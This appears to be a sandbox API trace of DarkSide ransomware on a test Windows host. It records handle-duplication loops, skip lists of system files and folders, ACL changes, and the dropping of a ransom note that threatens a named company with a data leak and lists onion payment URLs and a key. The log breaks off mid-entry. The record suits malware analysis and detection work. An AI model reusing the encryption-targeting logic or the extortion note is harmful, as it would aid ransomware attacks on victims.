[0155.293] CloseHandle (hObject=0x680) returned 1 [0155.293] CloseHandle (hObject=0x62c) returned 1 [0155.293] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0155.293] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.294] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.296] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.296] CloseHandle (hObject=0x670) returned 1 [0155.296] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.296] CloseHandle (hObject=0x680) returned 1 [0155.296] CloseHandle (hObject=0x62c) returned 1 [0155.296] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0155.296] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.297] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.298] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.298] CloseHandle (hObject=0x670) returned 1 [0155.298] CloseHandle (hObject=0x680) returned 1 [0155.298] CloseHandle (hObject=0x62c) returned 1 [0155.298] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0155.298] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.298] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.299] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.299] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.299] CloseHandle (hObject=0x670) returned 1 [0155.299] _wcsicmp (_Str1="\\EQUATION", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0155.299] CloseHandle (hObject=0x680) returned 1 [0155.299] CloseHandle (hObject=0x62c) returned 1 [0155.299] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x114) returned 0x62c [0155.300] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.300] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.301] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.301] CloseHandle (hObject=0x670) returned 1 [0155.301] _wcsicmp (_Str1="\\Fonts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0155.301] CloseHandle (hObject=0x680) returned 1 [0155.301] CloseHandle (hObject=0x62c) returned 1 [0155.301] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0155.301] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.301] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.302] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.302] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.302] CloseHandle (hObject=0x670) returned 1 [0155.303] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.303] CloseHandle (hObject=0x680) returned 1 [0155.303] CloseHandle (hObject=0x62c) returned 1 [0155.303] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0155.303] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.304] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.306] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.306] CloseHandle (hObject=0x670) returned 1 [0155.306] CloseHandle (hObject=0x680) returned 1 [0155.306] CloseHandle (hObject=0x62c) returned 1 [0155.306] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0155.306] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.307] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.307] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.308] CloseHandle (hObject=0x670) returned 1 [0155.308] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.308] CloseHandle (hObject=0x680) returned 1 [0155.308] CloseHandle (hObject=0x62c) returned 1 [0155.308] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x88c) returned 0x62c [0155.308] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.308] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.309] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.309] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.309] CloseHandle (hObject=0x670) returned 1 [0155.309] CloseHandle (hObject=0x680) returned 1 [0155.309] CloseHandle (hObject=0x62c) returned 1 [0155.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0155.309] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.310] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.311] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.311] CloseHandle (hObject=0x670) returned 1 [0155.311] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.311] CloseHandle (hObject=0x680) returned 1 [0155.311] CloseHandle (hObject=0x62c) returned 1 [0155.311] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0155.311] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.311] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.312] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.313] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.313] CloseHandle (hObject=0x670) returned 1 [0155.313] CloseHandle (hObject=0x680) returned 1 [0155.313] CloseHandle (hObject=0x62c) returned 1 [0155.313] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0155.313] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.314] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.314] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.314] CloseHandle (hObject=0x670) returned 1 [0155.314] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.314] CloseHandle (hObject=0x680) returned 1 [0155.315] CloseHandle (hObject=0x62c) returned 1 [0155.315] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0155.315] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.315] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.318] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.318] CloseHandle (hObject=0x670) returned 1 [0155.318] CloseHandle (hObject=0x680) returned 1 [0155.318] CloseHandle (hObject=0x62c) returned 1 [0155.318] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0155.318] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.318] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.319] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.319] CloseHandle (hObject=0x670) returned 1 [0155.319] _wcsicmp (_Str1="\\My", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.319] CloseHandle (hObject=0x680) returned 1 [0155.319] CloseHandle (hObject=0x62c) returned 1 [0155.319] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8ec) returned 0x62c [0155.319] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.320] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.321] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.321] CloseHandle (hObject=0x670) returned 1 [0155.321] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0155.321] CloseHandle (hObject=0x680) returned 1 [0155.321] CloseHandle (hObject=0x62c) returned 1 [0155.321] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0155.321] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.322] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.322] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.322] CloseHandle (hObject=0x670) returned 1 [0155.322] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0155.322] CloseHandle (hObject=0x680) returned 1 [0155.322] CloseHandle (hObject=0x62c) returned 1 [0155.322] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x618) returned 0x62c [0155.322] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0155.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0155.323] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0155.325] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0155.325] CloseHandle (hObject=0x670) returned 1 [0155.325] CloseHandle (hObject=0x680) returned 1 [0155.326] CloseHandle (hObject=0x62c) returned 1 [0155.326] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d8098) returned 1 [0155.326] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0155.326] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0155.326] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0155.326] _wcsicmp (_Str1="ntuser.ini", _Str2="README.c06622a1.TXT") returned -4 [0155.326] wcsstr (_Str="ntuser.ini", _SubStr="README") returned 0x0 [0155.326] _wcsicmp (_Str1="autorun.inf", _Str2="ntuser.ini") returned -13 [0155.327] wcslen (_String="autorun.inf") returned 0xb [0155.327] _wcsicmp (_Str1="boot.ini", _Str2="ntuser.ini") returned -12 [0155.327] wcslen (_String="boot.ini") returned 0x8 [0155.327] _wcsicmp (_Str1="bootfont.bin", _Str2="ntuser.ini") returned -12 [0155.327] wcslen (_String="bootfont.bin") returned 0xc [0155.327] _wcsicmp (_Str1="bootsect.bak", _Str2="ntuser.ini") returned -12 [0155.327] wcslen (_String="bootsect.bak") returned 0xc [0155.327] _wcsicmp (_Str1="desktop.ini", _Str2="ntuser.ini") returned -10 [0155.327] wcslen (_String="desktop.ini") returned 0xb [0155.327] _wcsicmp (_Str1="iconcache.db", _Str2="ntuser.ini") returned -5 [0155.327] wcslen (_String="iconcache.db") returned 0xc [0155.327] _wcsicmp (_Str1="ntldr", _Str2="ntuser.ini") returned -9 [0155.327] wcslen (_String="ntldr") returned 0x5 [0155.327] _wcsicmp (_Str1="ntuser.dat", _Str2="ntuser.ini") returned -5 [0155.327] wcslen (_String="ntuser.dat") returned 0xa [0155.327] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ntuser.ini") returned -5 [0155.327] wcslen (_String="ntuser.dat.log") returned 0xe [0155.327] _wcsicmp (_Str1="ntuser.ini", _Str2="ntuser.ini") returned 0 [0155.327] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe03f3980, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe03f3980, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0155.327] _wcsicmp (_Str1="$recycle.bin", _Str2="Pictures") returned -76 [0155.327] wcslen (_String="$recycle.bin") returned 0xc [0155.327] _wcsicmp (_Str1="config.msi", _Str2="Pictures") returned -13 [0155.327] wcslen (_String="config.msi") returned 0xa [0155.327] _wcsicmp (_Str1="$windows.~bt", _Str2="Pictures") returned -76 [0155.327] wcslen (_String="$windows.~bt") returned 0xc [0155.327] _wcsicmp (_Str1="$windows.~ws", _Str2="Pictures") returned -76 [0155.327] wcslen (_String="$windows.~ws") returned 0xc [0155.327] _wcsicmp (_Str1="windows", _Str2="Pictures") returned 7 [0155.327] wcslen (_String="windows") returned 0x7 [0155.327] _wcsicmp (_Str1="appdata", _Str2="Pictures") returned -15 [0155.327] wcslen (_String="appdata") returned 0x7 [0155.327] _wcsicmp (_Str1="application data", _Str2="Pictures") returned -15 [0155.327] wcslen (_String="application data") returned 0x10 [0155.327] _wcsicmp (_Str1="boot", _Str2="Pictures") returned -14 [0155.327] wcslen (_String="boot") returned 0x4 [0155.327] _wcsicmp (_Str1="google", _Str2="Pictures") returned -9 [0155.327] wcslen (_String="google") returned 0x6 [0155.327] _wcsicmp (_Str1="mozilla", _Str2="Pictures") returned -3 [0155.328] wcslen (_String="mozilla") returned 0x7 [0155.328] _wcsicmp (_Str1="program files", _Str2="Pictures") returned 9 [0155.328] wcslen (_String="program files") returned 0xd [0155.328] _wcsicmp (_Str1="program files (x86)", _Str2="Pictures") returned 9 [0155.328] wcslen (_String="program files (x86)") returned 0x13 [0155.328] _wcsicmp (_Str1="programdata", _Str2="Pictures") returned 9 [0155.328] wcslen (_String="programdata") returned 0xb [0155.328] _wcsicmp (_Str1="system volume information", _Str2="Pictures") returned 3 [0155.328] wcslen (_String="system volume information") returned 0x19 [0155.328] _wcsicmp (_Str1="tor browser", _Str2="Pictures") returned 4 [0155.328] wcslen (_String="tor browser") returned 0xb [0155.328] _wcsicmp (_Str1="windows.old", _Str2="Pictures") returned 7 [0155.328] wcslen (_String="windows.old") returned 0xb [0155.328] _wcsicmp (_Str1="intel", _Str2="Pictures") returned -7 [0155.328] wcslen (_String="intel") returned 0x5 [0155.328] _wcsicmp (_Str1="msocache", _Str2="Pictures") returned -3 [0155.328] wcslen (_String="msocache") returned 0x8 [0155.328] _wcsicmp (_Str1="perflogs", _Str2="Pictures") returned -4 [0155.328] wcslen (_String="perflogs") returned 0x8 [0155.328] _wcsicmp (_Str1="x64dbg", _Str2="Pictures") returned 8 [0155.328] wcslen (_String="x64dbg") returned 0x6 [0155.328] _wcsicmp (_Str1="public", _Str2="Pictures") returned 12 [0155.328] wcslen (_String="public") returned 0x6 [0155.328] _wcsicmp (_Str1="all users", _Str2="Pictures") returned -15 [0155.328] wcslen (_String="all users") returned 0x9 [0155.328] _wcsicmp (_Str1="default", _Str2="Pictures") returned -12 [0155.328] wcslen (_String="default") returned 0x7 [0155.328] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0155.328] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0155.328] wcscpy (in: _Dest=0x4480094, _Source="Pictures" | out: _Dest="Pictures") returned="Pictures" [0155.328] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0155.329] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0155.330] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.330] GetNamedSecurityInfoW () returned 0x0 [0155.330] SetEntriesInAclW () returned 0x0 [0155.330] SetNamedSecurityInfoW () returned 0x0 [0155.355] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d58238) returned 1 [0155.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.355] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 1 [0155.355] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0155.355] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0155.355] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0155.356] CloseHandle (hObject=0x678) returned 1 [0155.357] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.357] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.357] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: 